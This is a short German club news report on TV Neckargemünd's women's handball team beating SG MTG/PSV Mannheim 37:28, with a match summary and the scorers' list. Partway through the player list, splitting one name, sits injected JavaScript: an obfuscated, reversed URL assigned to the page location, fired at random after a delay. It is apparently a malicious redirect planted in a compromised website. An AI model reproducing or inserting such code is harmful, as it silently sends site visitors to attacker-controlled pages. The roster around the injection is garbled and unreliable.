Damen: Guter Start in 2020 | 37:28 (19:11)

TV Neckargemünd – SG MTG/PSV Mannheim

Am Sonntag begrüßten die Damen des TVN die Damen der SG MTG /PSV MA. Das Hinspiel konnte mit 7 Toren gewonnen werden.

Das Spiel begann sehr sehenswert. Im Angriff gab es sehr schöne Anspiele und auch die Abwehr stand kompakt, sodass sich die Heimmannschaft bis zur 21. Spielminute einen 10-Tore Vorsprung erspielen konnte(17:7).

Halbzeitstand 19:11

In der 2. Halbzeit lief in der eigenen Abwehr eigentlich nichts mehr, die Damen des TVN ließen die Gäste tun und lassen was sie wollten. Zum Glück sah das im Angriff etwas anders aus. Somit gewannen die Damen des TVN mit 37:28.

Es spielten:
Kira Heckmann (Tor),Cornelia Dett 3, Lisa Hangel 2,Kathrin Knauf 5, Antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonia Klumbies, Sarah Gries 1, Keilie Golic, Michaela Jung-Grunert 8/3, Lara Capriglione 1, Leonie Bauer, Sina Illenberger 10/2 ,Saskia Buse 7, Elaine Weitzel
Trainer: Stephan Pfirmann